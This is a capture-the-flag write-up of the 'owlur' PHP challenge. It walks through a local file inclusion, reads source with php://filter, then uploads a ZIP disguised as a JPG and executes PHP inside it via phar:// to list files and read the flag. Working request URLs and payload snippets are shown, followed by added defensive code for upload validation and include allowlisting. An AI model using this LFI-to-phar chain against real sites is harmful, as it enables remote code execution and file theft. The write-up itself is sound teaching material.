


 □ description

==========================================

http://54.65.205.135/owlur/


if you use a web scanner, your IP will get banned

no bruteforce required, take it easy

==========================================


http://54.64.81.174/owlur/


The site lets you upload files.

Click here to view a random owl.

Clicking "here" shows a random owl, as below.


http://54.64.81.174/owlur/index.php?page=view&id=random


Setting the page parameter to view shows the picture as in the figure above, and setting it to index shows the index page as in the figure below.

PHP files are executed according to the page parameter.

This shows that index.php has a Local File Inclusion vulnerability.


http://54.64.81.174/owlur/index.php?page=index&id=random


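Among the PHP wrappers, php://filter can be used to read the source code. The response contains the base64-encoded source; decoded, it gives the PHP shown after each request below.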



view.php

http://54.64.81.174/owlur/index.php?page=php://filter/convert.base64-encode/resource=view




<?php
$pic = $_REQUEST['id'];
 
if($pic == "" || $pic == "random")
{
    $picname = "preloaded-owls/" . rand(1,14) . ".jpg";
}
 
else $picname = "/owl/" . $pic . ".jpg";
 
echo '<img src="' . $picname . '">';
 
?>

upload.php

http://54.64.81.174/owlur/index.php?page=php://filter/convert.base64-encode/resource=upload




<?php
 
function RandomString()
{
    $characters = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
    $randstring = "";
    for ($i = 0; $i < 7; $i++) {
        $randstring .= $characters[rand(0, strlen($characters)-1)];
    }
    return $randstring;
}
 
$target_dir = "/var/www/owlur/owlur-upload-zzzzzz/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
$uploadOk = 0;
$imageFileType = pathinfo($target_file,PATHINFO_EXTENSION);
$fsize = $_FILES['fileToUpload']['size'];
$newid = RandomString();
$newname = $newid . ".jpg";
 
if(isset($_POST["submit"])) {
    if($imageFileType == "jpg") {
        $uploadOk = 1;
    } else {
    echo "<p>Sorry, only JPG images of owls will be accepted. Please use a different service if you do not intend to upload owl pictures.</p>";
        $uploadOk = 0;
    }
 
    if(!($fsize >= 0 && $fsize <= 200000)) {
    $uploadOk = 0;
        echo "<p>Sorry, the size of your owl picture is not to our liking.</p>";
    }
}
 
if($uploadOk)
{
 
$newpath = "/var/www/owlur/owlur-upload-zzzzzz/" . $newname;
 
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $newpath)) {
    header('Location: /owlur/index.php?page=view&id=' . $newid);
    } else {
        echo "<p>Sorry, there was an error uploading your file.</p>";
    }
}
 
?>


Uploading a file gives the following.

http://54.64.81.174/owlur/index.php?page=view&id=zfqvcDH


The upload.php source checks that the file extension is .jpg, but nothing checks the file content.
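A content-based check for the gap described above, as an added example that is not part of the challenge's code. It assumes the fileinfo and GD extensions; the function name and the sample files are constructed for illustration.

```php
<?php
// Added example, not the challenge's code. Assumes the fileinfo and GD extensions.
// In a real handler $tmpPath is $_FILES['fileToUpload']['tmp_name'] and
// is_uploaded_file($tmpPath) is checked first.
function store_owl_upload(string $tmpPath, string $destDir): ?string
{
    // 1. Sniff the content, not the client-supplied name: a ZIP renamed to
    //    .jpg is not reported as image/jpeg.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime !== 'image/jpeg') {
        return null;
    }
    // 2. The file must decode as an image.
    $img = @imagecreatefromjpeg($tmpPath);
    if ($img === false) {
        return null;
    }
    // 3. Store a re-encoded copy under a server-chosen name, so only pixel
    //    data is written and any bytes appended to the image are dropped.
    $name = bin2hex(random_bytes(8)) . '.jpg';
    return imagejpeg($img, $destDir . '/' . $name, 90) ? $name : null;
}

// Constructed sample inputs in a scratch directory.
$dir = sys_get_temp_dir() . '/owl-demo-' . bin2hex(random_bytes(4));
mkdir($dir);
// ZIP local-file-header magic followed by filler, saved with a .jpg name.
file_put_contents("$dir/d.jpg", "PK\x03\x04" . str_repeat("\x00", 64));
// A real 8x8 JPEG produced by GD.
imagejpeg(imagecreatetruecolor(8, 8), "$dir/owl.jpg");

foreach (['d.jpg', 'owl.jpg'] as $f) {
    $stored = store_owl_upload("$dir/$f", $dir);
    echo $f, ' -> ', $stored === null ? 'rejected' : "stored as $stored", PHP_EOL;
}
```

Content validation narrows what can be planted on disk; it does not replace fixing the include of a request-controlled path in index.php.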


For the attack I used phar://.

phar:// — PHP Archive


d.php

<?php print_r(scandir('/'))?>


Compress the d.php file.

Rename the compressed d.php.zip to d.jpg.



Uploading d.jpg gives the following.

http://54.64.81.174/owlur/index.php?page=view&id=OoebY7U


Using phar://, the .jpg file (under its changed file name) is opened as an archive and the d.php inside it is executed.

http://54.64.81.174/owlur/index.php?page=phar:///var/www/owlur/owlur-upload-zzzzzz/OoebY7U.jpg/d


The OWLUR_FLAG.txt file is visible in the root directory.

Its content can be read the same way.


o.php

<?php echo file_get_contents('/OWLUR-FLAG.txt')?>


Compress the o.php file.

Rename the compressed o.php.zip to o.jpg.


http://54.64.81.174/owlur/index.php?page=view&id=jnxL8Ja

http://54.64.81.174/owlur/index.php?page=phar:///var/www/owlur/owlur-upload-zzzzzz/jnxL8Ja.jpg/o



flag : PHP fILTerZ aR3 c00l buT i pr3f3r f1lt3r 0xc0ffee

 




<?php echo file_get_contents('/var/www/owlur/index.php')?>


<?php
$p = $_REQUEST['page'];
 
if($p == "" || $p == "index")
{
$p = "main";
}
 
$haq = base64_decode("ICAgICAgICAgICAgICAgICAgIC8tLS0tLS0tLS0KICAgICAgICAgICAgICAgICAgLyAvIC8qKioqKipcCiAgICAgICAgICAgICAgICAgLyAvKioqKi0tICogKlwKICAgICAgLy8oKCg6PDw8PC86KioqKioqKioqM1xYKlwoKDwKICAgICAvWFgvQ1hDJkNHRy8vKiovLS0vLy9YKlZcKiouLmcmCigvVkNDM2dnMC4uLi4uLi4uKi8vWC8vKC8vL1YqQ1wqLi44ODhnZzhnJjNDPAooMyZnRyYuLi4uLi4uLi4uLiouLlhYWC8oKCgvKi5cKi4uLi4uLi5HLzA4ODgzWDxgCi8oPEM4IC4uLi4uLi4uLi4uKi5YWFhYLy8vLzwvLi4qLi4uLi4uLi4uLi4uLi4uM0NeClgvLzw8Ly4uLi4uLi4uLi4uKiZDVlgvLy9WLzw8Ly4qLi4uLi4uLi4uLi4uLi4uOEdDPApYWC9DLzo8L1YuLi4uLi4uLiomM0NWWFZYVlgoPFYqKi4uLi4uLi4uLi4uLi4uLiBnOENeCiAgICBHQy88PC8oLi4uLi44RyYzQ0NWWFhYWFZ+WFYqLi4uLi4uLi4uLi4uLi4uIEM4M1YKICAgICAgIFYvPF48KFg4OCZWLy8oKDw8PDwoKDxePCoqLi4uLi4uLi4uLi4uLi4uWCYmQwogICAgICAgICAgICAgIGA6L0NDVi8oKCg8PCgvVlZWLyouLi4uLi4uLi4uLi4uLigvQyYvCiAgICAgICAgICAgICAgIDw8IF5eKC9WMzNWWC9WQyZYKlZDLi4uLjo8PH48PDwoKFggIGAKICAgICAgICAgICAgICAgVi8oLzwgXiBeXjovWC8oKDw8Xl4tLS1WOn5+PDwoCiAgICAgICAgICAgICAgMyYgICAgICAgICAgICAgICAgICAuXi0vCiAgICAgICAgICAgICAgQyAgL1wgICAgICAgL1wgICAgICAgIHwKICAgICAgICAgICAgIC9DICBcLyAgICAgICBcLyAgICAgICAvLwogUExaIFNUT1AgICAgIDMgICAgICAgICAgICAgICAgICAgIHxcCiAgIEhBQ0tJTkcgICAgQyAgICAgICAgICAgICAgICAgICAvNSoKICAgICAgICAgICAgICBWICAgICAvLS0tLS1cICAgICAgIC8KICAgICAgICAgICAgICBDRyAgfCAgICAgICAgIHwgIDwvLy88CiAgICAgICAgICAgICAgVkdWIHwgICAgICAgICB8IF4oL1g8XgogICAgICAgICAgICAgICAmJjwgIFwtLS0tLS8gIC4oKDwoXgogICAgICAgICAgICAgICAgODMoICAgICAgICAuPCh+YDw8CiAgICAgICAgICAgICAgICAgOFhgICAgICAuPDxeYCBgKCheCiAgICAgICAgICAgICAgICBCQEBDPC5gXl5gICAgICBeKENHJkMoPC5gYAogICAgIENHOEIkQEBAQEBAQEBAJCggICAgICAgICAgXl4oMEBAQEAkODNYPGAKICAgQkBAQEBAQEBAQEBAQEBAQEBAOC8gICAgICAgYDxDJEBAQEBAQEBAQEAkJjwKICBAQEBAQEBAQEBAQEBAQEAkJCRAQEAkJDA4ODhCQEBAQEBAQEBAQEBAQEBAQEBWYAogQEBAQEBAQEBAQEBAQEAkQCQkJCQkJCRAQEBAJCRAQEAkQEBAQEBAQEBAQEBAQEBDYApAQEBAQEBAQEBAQEBAQCRAJCQkJCQkJCQkJCQkJCQkJCQkQEBAQEBAQEBAQEBAQEBAKGAKQEBAQEBAQEBAQEAkQCQkJCQkJCQkJCQkJCQkQEAkJEBAQEBAQEBAQEBAQEBAQEBAQEIK");
$haq = htmlentities($haq);
 
if(strstr($p,"..") !== FALSE)
die("<pre>$haq</pre>");
 
if(stristr($p,"http") !== FALSE)
die("<pre>$haq</pre>");
 
if(stristr($p,"ftp") !== FALSE)
die("<pre>$haq</pre>");
 
if(strlen($p) >= 60)
die("<pre>string > 60
$haq</pre>");
 
$inc = sprintf("%s.php",$p);
 
?>
 
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Owlur - The simple image sharing website for owl pictures</title>
 
    <!-- Bootstrap -->
    <link href="css/bootstrap.min.css" rel="stylesheet">
 
    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
  </head>
  <body style="background-color: #d0d0c8;">
<center>
<h1>owlur</h1>
 
<?php
include($inc);
?>
 
</center>
    <!-- jQuery (necessary for Bootstrap's JavaScript plugins) -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>
    <!-- Include all compiled plugins (below), or include individual files as needed -->
    <script src="js/bootstrap.min.js"></script>
  </body>
</html>
 


                   /---------
                  / / /******\
                 / /****-- * *\
      //(((:<<<</:*********3\X*\((<
     /XX/CXC&CGG//**/--///X*V\**..g&
(/VCC3gg0........*//X//(///V*C\*..888gg8g&3C<
(3&gG&...........*..XXX/(((/*.\*.......G/08883X<`
/(<C8 ...........*.XXXX////</..*...............3C^
X//<</...........*&CVX///V/<</.*...............8GC<
XX/C/:</V........*&3CVXVXVX(<V**............... g8C^
    GC/<</(.....8G&3CCVXXXXV~XV*............... C83V
       V/<^<(X88&V//((<<<<((<^<**...............X&&C
              `:/CCV/(((<<(/VVV/*..............(/C&/
               << ^^(/V33VX/VC&X*VC....:<<~<<<((X  `
               V/(/< ^ ^^:/X/((<<^^---V:~~<<(
              3&                  .^-/
              C  /\       /\        |
             /C  \/       \/       //
 PLZ STOP     3                    |\
   HACKING    C                   /5*
              V     /-----\       /
              CG  |         |  <///<
              VGV |         | ^(/X<^
               &&<  \-----/  .((<(^
                83(        .<(~`<<
                 8X`     .<<^` `((^
                B@@C<.`^^`     ^(CG&C(<.``
     CG8B$@@@@@@@@@$(          ^^(0@@@@$83X<`
   B@@@@@@@@@@@@@@@@@8/       `<C$@@@@@@@@@@$&<
  @@@@@@@@@@@@@@@$$$@@@$$0888B@@@@@@@@@@@@@@@@@V`
 @@@@@@@@@@@@@@$@$$$$$$$@@@@$$@@@$@@@@@@@@@@@@@@C`
@@@@@@@@@@@@@@$@$$$$$$$$$$$$$$$$$$@@@@@@@@@@@@@@@(`
@@@@@@@@@@@$@$$$$$$$$$$$$$$@@$$@@@@@@@@@@@@@@@@@@B
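The index.php source above filters the page value with a blocklist ("..", "http", "ftp", length under 60), which the php:// and phar:// requests in this write-up pass. The following added example, not part of the challenge's code, runs those same request values through the original checks and through an allowlist lookup; the page names in PAGES are assumed from the write-up and the function names are hypothetical.

```php
<?php
// Added example, not the challenge's code. The page names are assumed from
// the write-up (main, view, upload).
const PAGES = ['main' => 'main.php', 'view' => 'view.php', 'upload' => 'upload.php'];

// The original checks from index.php as one predicate (true = request dies).
function blocklist_rejects(string $p): bool
{
    return strstr($p, '..') !== false
        || stristr($p, 'http') !== false
        || stristr($p, 'ftp') !== false
        || strlen($p) >= 60;
}

// Allowlist: the request value is only a lookup key and never becomes part
// of the path handed to include.
function resolve_page(string $p): ?string
{
    if ($p === '' || $p === 'index') {
        $p = 'main';
    }
    return PAGES[$p] ?? null;
}

// Worth logging: a page value that starts with a URL scheme such as php:// or phar://.
function has_stream_scheme(string $p): bool
{
    return preg_match('~^[a-z][a-z0-9+.-]*://~i', $p) === 1;
}

// Request values taken from this write-up.
$samples = [
    'view',
    'php://filter/convert.base64-encode/resource=view',
    'phar:///var/www/owlur/owlur-upload-zzzzzz/OoebY7U.jpg/d',
];
foreach ($samples as $p) {
    printf("%s\n  blocklist: %s | allowlist: %s | scheme: %s\n",
        $p,
        blocklist_rejects($p) ? 'reject' : 'pass',
        resolve_page($p) ?? 'reject',
        has_stream_scheme($p) ? 'yes' : 'no');
}
```

In index.php the value returned by resolve_page would replace $inc, with a null result answered by an error page instead of an include.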
 


